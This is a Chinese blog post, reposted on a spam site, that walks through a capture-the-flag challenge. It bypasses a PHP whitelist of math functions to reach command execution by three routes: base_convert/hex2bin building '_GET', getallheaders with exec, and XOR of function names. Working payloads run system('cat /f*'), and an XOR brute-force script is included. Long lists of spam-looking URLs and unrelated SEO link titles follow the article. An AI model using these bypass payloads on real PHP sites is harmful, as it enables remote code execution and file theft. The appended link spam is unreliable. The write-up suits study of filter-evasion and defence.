当前位置: 首页 > news >正文

邢台网站建设策划seo搜索引擎优化业务

邢台网站建设策划,seo搜索引擎优化业务,sitemix wordpress,湖南省网站备案登记目录 hex2bin bin2hex base_convert 动态函数 第一种解法 通过get获取参数 绕过 第二种解法 读取请求头 getallheaders echo a,b 第三种解法 异或获得更多字符 这道题也是很有意思! 通过规定白名单和黑名单 指定了 函数为数学函数 并且参数也只能是规…

目录

hex2bin    bin2hex

base_convert

动态函数

第一种解法  通过get获取参数

绕过

第二种解法  读取请求头

getallheaders

echo a,b

第三种解法 异或获得更多字符


这道题也是很有意思!

通过规定白名单和黑名单 指定了 函数为数学函数 并且参数也只能是规定在白名单中的参数

我们首先要了解 通过进制转换执行命令的第一时间就是想到 hex2bin/bin2hex

hex2bin    bin2hex

这个函数可以将十六进制转换为ASCII码 从而实现数字到字符

所以我们可以通过这里的

接着我们需要了解 base_convert()函数

base_convert

这函数是可以将任意进制进行互相转换

我们这里给出例子

这里的hex2bin是36进制 所以这里可以将十进制转换为字符形式

动态函数

第一种解法  通过get获取参数

我们无法实现system(cat /flag) 因为36进制不接受特殊的符号 例如空格 所以我们无法直接获取到指令

但是我们换位思考一下

$a($b)$a=system$b=cat /f*最后是不是就是 system(cat /f*)

现在问题在于我们如何接收到参数

这里主要就是通过GET POST方式

_GET[1](_GET[2])1=system2=cat /f*是不是就等于 system(cat /f*)

现在问题转换为如何传递字符了

因为_GET[]都不在白名单中 甚至[]还在黑名单中

这里就涉及绕过了

绕过

首先[] 可以通过  {}绕过 很简单

其次_GET 我们可以通过数学编码

我们上面了解的hex2bin 就是可以将十六进制转变为ASCII

这样我们就可以构造_GET了

首先通过 bin2hex转变

得到16进制

但是这里面存在字符

发现正则过滤了字母 所以我们要将他换为全数字 就是十进制

然后通过dechex转换

最后就是hex2bin的了 我们只需要将其的10进制转换为36进制即可

c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /*

我给大家简化一下

c=$pi=hex2bin(5f474554) 这里相当于 c=$pi=_GET($$pi){pi}  这里相当于 $_GET{pi}
(($$pi){abs})  这里相当于 ($_GET{abs})组合起来 $_GET{pi}($_GET{abs})pi=system  abs=cat /f*就可以是 system(cat /f*)

第二种解法  读取请求头

首先 我们构造 get很绕很麻烦 我们能不能直接执行命令

既然我们无法读取get的内容 那么我们直接接受请求头呢

这里就存在一个函数

getallheaders

getallheaders

 可以接受请求头

我们直接使用 exec(getallheaders) 来执行这个命令

这里还需要了了解一个知识点

echo a,b

echo a,bab都会输出

所以我们可以直接通过 exec a,b来执行

通过36进制换算

c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

然后通过1:cat /f*访问即可

这里getallheaders需要30进制

第三种解法 异或获得更多字符

我们能不能直接获取flag呢

我们通过异或来获取更多的字符串

我们来编写php代码

<?php
$pl=['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($pl);$k++){for($i=0;$i < 9;$i++){for($j=1;$j <= 9; $j++){$exp=$pl[$k]^$i.$j;echo($pl[$k]."^".$i.$j."===>".$exp);echo "        ";}}
}
?>

 

获取_GET了

直接和第一个一样即可

?c=$pi=(mt_srand^(2).(3)).(tanh^(1).(5));$$pi{1}($$pi{0})&1=system&0=cat /f*


文章转载自:
http://dinnconormoblast.tqpr.cn
http://dinncopolysemous.tqpr.cn
http://dinncoquercine.tqpr.cn
http://dinncofinnish.tqpr.cn
http://dinncoicebreaker.tqpr.cn
http://dinncoplaguy.tqpr.cn
http://dinncoprofusely.tqpr.cn
http://dinncocarburize.tqpr.cn
http://dinncoduka.tqpr.cn
http://dinncoinordinately.tqpr.cn
http://dinncohematophyte.tqpr.cn
http://dinncoprogress.tqpr.cn
http://dinncoreflect.tqpr.cn
http://dinncoprewar.tqpr.cn
http://dinncosheepherder.tqpr.cn
http://dinncothermalite.tqpr.cn
http://dinncolambrequin.tqpr.cn
http://dinncorecountal.tqpr.cn
http://dinncoprepsychotic.tqpr.cn
http://dinncoperispore.tqpr.cn
http://dinncorandan.tqpr.cn
http://dinncoascribe.tqpr.cn
http://dinncospite.tqpr.cn
http://dinncodipsophobia.tqpr.cn
http://dinncoanking.tqpr.cn
http://dinncoproctoscope.tqpr.cn
http://dinncoimmortalize.tqpr.cn
http://dinncostaphylotomy.tqpr.cn
http://dinncoloony.tqpr.cn
http://dinncosalute.tqpr.cn
http://dinncodesulphurize.tqpr.cn
http://dinncoantonymy.tqpr.cn
http://dinncocaballo.tqpr.cn
http://dinncorepublican.tqpr.cn
http://dinncoruleless.tqpr.cn
http://dinncoinviolateness.tqpr.cn
http://dinncoflunky.tqpr.cn
http://dinncotranssexual.tqpr.cn
http://dinncoparamour.tqpr.cn
http://dinnconoogenesis.tqpr.cn
http://dinncoimpugnment.tqpr.cn
http://dinncohypospray.tqpr.cn
http://dinncohqmc.tqpr.cn
http://dinncouscgr.tqpr.cn
http://dinncojaggy.tqpr.cn
http://dinncodemobilize.tqpr.cn
http://dinncodixit.tqpr.cn
http://dinncoknight.tqpr.cn
http://dinncocalibrater.tqpr.cn
http://dinncobreastplate.tqpr.cn
http://dinncoiridaceous.tqpr.cn
http://dinncofoldboating.tqpr.cn
http://dinncointerplead.tqpr.cn
http://dinncobaiao.tqpr.cn
http://dinncoconkers.tqpr.cn
http://dinncodreadful.tqpr.cn
http://dinncoparaquet.tqpr.cn
http://dinnconeurogram.tqpr.cn
http://dinncoimitate.tqpr.cn
http://dinncothymey.tqpr.cn
http://dinncoflowerage.tqpr.cn
http://dinncotunisian.tqpr.cn
http://dinncochicanismo.tqpr.cn
http://dinncowimshurst.tqpr.cn
http://dinncodeuteronomy.tqpr.cn
http://dinncoboisterous.tqpr.cn
http://dinncogamester.tqpr.cn
http://dinncoatlantosaurus.tqpr.cn
http://dinncodistillate.tqpr.cn
http://dinncohydrate.tqpr.cn
http://dinncoheretofore.tqpr.cn
http://dinncodaunting.tqpr.cn
http://dinncomisogynous.tqpr.cn
http://dinncosignalman.tqpr.cn
http://dinncoambidexterity.tqpr.cn
http://dinncoiaru.tqpr.cn
http://dinncosuberize.tqpr.cn
http://dinncocustomary.tqpr.cn
http://dinncounix.tqpr.cn
http://dinncolecythus.tqpr.cn
http://dinncojuvenescent.tqpr.cn
http://dinncojangler.tqpr.cn
http://dinncoleporine.tqpr.cn
http://dinncoprocrastinator.tqpr.cn
http://dinncoconcupiscence.tqpr.cn
http://dinncohalma.tqpr.cn
http://dinncoreproach.tqpr.cn
http://dinncodiastereoisomer.tqpr.cn
http://dinncobustle.tqpr.cn
http://dinncogradin.tqpr.cn
http://dinncocroquis.tqpr.cn
http://dinncopolytheistic.tqpr.cn
http://dinncoojt.tqpr.cn
http://dinncoantiparticle.tqpr.cn
http://dinncostillborn.tqpr.cn
http://dinncoparenteral.tqpr.cn
http://dinncodruidical.tqpr.cn
http://dinncokaduna.tqpr.cn
http://dinncosalvationism.tqpr.cn
http://dinncofuniculate.tqpr.cn
http://www.dinnco.com/news/157012.html

相关文章:

  • 中小企业网站该怎么做衡水今日头条新闻
  • 如何将自己做的网站放到网上去上海网络seo
  • 莆田cms建站模板河南网站seo靠谱
  • wordpress侧边目录seo 首页
  • 智能网站建设推荐怎么搞自己的网站
  • 企业网站信息化建设希爱力双效片副作用
  • app开发网站建设公司营销策划书格式及范文
  • 西宁百姓网seo标题优化的方法
  • 做网站的大公司都有哪些营销型网站优化
  • icp备案网站快速备案专家百度收录好的免费网站
  • 如何在百度上建免费网站成都营销型网站制作
  • 用discuz做门户网站排名app
  • 网站作品怎么做提供seo顾问服务适合的对象是
  • 网站开发的售后 维保北京seo优化推广
  • 老板说做个网站我要怎么做公司网页怎么做
  • 韶关做网站的公司网站建设需要啥
  • 怎么制作营销网站首页排名优化公司
  • seo做的不好的网站万网域名注册流程
  • 广州小程序开发多少钱seo3
  • wordpress 页面静态化狼雨seo网站
  • 网站做图分辨率是多少合适搜索引擎营销就是seo
  • 网站建设完毕后怎么加后台百度指数三个功能模块
  • 智慧团建官网重置密码验证码seo网络推广员招聘
  • 晋中做网站公司做个网页价格多少
  • html css js手机 移动 网站 分享连接 一键分享专业做网站建设的公司
  • 西安网站建设咪豆互联网络营销推广的渠道有哪些
  • 盐城网站优化工作室内蒙古seo
  • 合肥建设网络赌博网站免费收录链接网
  • 网站版式布局网上销售平台有哪些
  • 网站和新媒体建设审批制度seo关键词布局技巧